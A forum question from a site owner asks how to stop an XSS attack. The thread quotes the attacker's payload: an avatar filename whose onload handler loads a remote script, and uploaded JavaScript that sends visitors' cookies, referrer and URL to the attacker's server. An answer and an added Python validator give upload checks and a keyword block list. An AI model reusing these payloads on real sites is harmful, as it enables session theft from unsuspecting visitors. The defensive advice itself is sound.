Protection against hacking
Artem Gartung, 2020-05-01 00:43:25

How do I protect the site from this kind of hack?

avatar.png" onload="let div=document.createElement('script');div.type='text/javascript';div.src='https://censored-domain/p/2.txt';document.body.append(div);


Code from the uploaded file:
// Injects a <script> tag that loads `filename` and keeps a per-URL include
// counter on window.php_js (a port of PHP's include() bookkeeping).
function include_file(filename) {
    var js = document.createElement('script');
    js.setAttribute('type', 'text/javascript');
    js.setAttribute('src', filename);
    js.setAttribute('defer', 'defer');
    document.getElementsByTagName('HEAD')[0].appendChild(js);

    var cur_file = {};
    cur_file[window.location.href] = 1;
    if (!window.php_js) window.php_js = {};
    if (!window.php_js.includes) window.php_js.includes = cur_file;
    if (!window.php_js.includes[filename]) {
        window.php_js.includes[filename] = 1;
    } else {
        window.php_js.includes[filename]++;
    }
    return window.php_js.includes[filename];
}

// Exfiltration: the victim's cookies, referrer and current URL are sent to the
// attacker's server as query parameters of a "script" request.
var svurl = "https://censored-domain/p/?cookie=" + encodeURIComponent(document.cookie)
    + '&ref=' + encodeURIComponent(document.referrer)
    + '&path=' + encodeURIComponent(location.href);
include_file(svurl);

1 answer(s)
xmoonlight, 2020-05-01
@blackangelada

1. The name of the uploaded file (and any user-supplied text) must be checked STRICTLY, and ONLY via a regex!
2. Check the body of the avatar immediately after upload (while the file is still in the temporary folder) for compliance with the image format. For example, request the image's resolution or any other property, i.e. check the header.
3. Check that the image file size is within the minimum and maximum limits.
4. And, at the same time, as a bonus, you can check the file body for any of the words: script, document, window, onload, onerror, function, body, query, select, update, insert.
BONUS: signatures.
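As an added example (editor's code, not from the question or the answer above), here is a server-side upload handler in Python that implements the four checks from the answer, plus two controls the answer does not spell out: the file is stored under a random server-generated name, and any name that is rendered into an HTML attribute is escaped, which is what stops the `avatar.png" onload=...` breakout shown in the question. The regex, the size limits, the 4096-pixel cap and all sample files and names are assumptions made for the example.

```python
import html
import re
import secrets
import struct

# Added example: avatar upload validation following the answer's four steps.
# All sample "uploads" below are constructed inline, not real files.

# 1. Filename: whitelist regex only; anything outside it is rejected.
SAFE_NAME = re.compile(r'^[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)$')
# 3. Size limits (assumed values).
MIN_SIZE, MAX_SIZE = 64, 2 * 1024 * 1024
# 4. Bonus keyword scan from the answer (heuristic, see note below).
SUSPICIOUS = re.compile(
    rb'\b(script|document|window|onload|onerror|function|body|select|update|insert)\b', re.I)


def sniff_image(data):
    """2. Parse the header bytes; return (format, width, height) or None."""
    if data[:8] == b'\x89PNG\r\n\x1a\n' and data[12:16] == b'IHDR':
        w, h = struct.unpack('>II', data[16:24])
        return 'png', w, h
    if data[:6] in (b'GIF87a', b'GIF89a'):
        w, h = struct.unpack('<HH', data[6:10])
        return 'gif', w, h
    if data[:3] == b'\xff\xd8\xff':
        i = 2  # walk JPEG segments until a SOF0/SOF2 frame header
        while i + 9 <= len(data) and data[i] == 0xFF:
            marker = data[i + 1]
            if marker == 0xFF:  # fill byte, skip
                i += 1
                continue
            if marker in (0xC0, 0xC2):
                h, w = struct.unpack('>HH', data[i + 5:i + 9])
                return 'jpeg', w, h
            i += 2 + struct.unpack('>H', data[i + 2:i + 4])[0]
    return None


def validate_upload(name, data, max_px=4096):
    """Return the list of failed checks; an empty list means accept."""
    errors = []
    name_ok = bool(SAFE_NAME.fullmatch(name))
    if not name_ok:
        errors.append('filename')
    if not MIN_SIZE <= len(data) <= MAX_SIZE:
        errors.append('size')
    info = sniff_image(data)
    if info is None:
        errors.append('format')
    else:
        fmt, w, h = info
        ext = name.lower().rsplit('.', 1)[-1]
        if name_ok and ('jpeg' if ext == 'jpg' else ext) != fmt:
            errors.append('extension-mismatch')
        if not (0 < w <= max_px and 0 < h <= max_px):
            errors.append('dimensions')
    if SUSPICIOUS.search(data):
        errors.append('suspicious-content')
    return errors


def store_name(fmt):
    """Never keep the user's name: random name + format sniffed from the bytes."""
    return secrets.token_hex(16) + '.' + fmt


def render_img(src):
    """Escape before placing a name in an attribute so quotes cannot close it."""
    return '<img src="%s">' % html.escape(src, quote=True)


# Constructed samples: minimal PNG and JPEG headers, the filename payload from
# the question, and an HTML document renamed to .png.
SAMPLE_PNG = (b'\x89PNG\r\n\x1a\n' + struct.pack('>I', 13) + b'IHDR'
              + struct.pack('>IIBBBBB', 64, 64, 8, 6, 0, 0, 0) + b'\0' * 100)
SAMPLE_JPEG = (b'\xff\xd8\xff\xe0' + struct.pack('>H', 16) + b'JFIF\0' + b'\0' * 9
               + b'\xff\xc0' + struct.pack('>H', 17) + b'\x08'
               + struct.pack('>HH', 48, 32) + b'\x03' + b'\0' * 9 + b'\0' * 64)
PAYLOAD_NAME = ('avatar.png" onload="let div=document.createElement(\'script\');'
                'div.src=\'https://censored-domain/p/2.txt\';document.body.append(div);')
HTML_AS_PNG = (b'<html><body><script src="https://censored-domain/p/2.txt">'
               b'</script></body></html>' + b' ' * 32)

if __name__ == '__main__':
    for n, d in [('avatar.png', SAMPLE_PNG), (PAYLOAD_NAME, SAMPLE_PNG),
                 ('avatar.png', HTML_AS_PNG), ('photo.jpg', SAMPLE_JPEG)]:
        print(repr(n[:24]), validate_upload(n, d) or 'accepted')
    print(render_img(PAYLOAD_NAME))
```

The keyword scan is a heuristic: with word boundaries and case-insensitive matching it catches HTML smuggled in an image file, but compressed pixel data can occasionally contain one of these words by chance, so treat a hit as "reject and log", not as proof of attack. The header sniffing stands in for what the answer calls "requesting the resolution"; in production the same step is usually done by opening the file with an image library and re-encoding it, which also strips any trailing payload.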
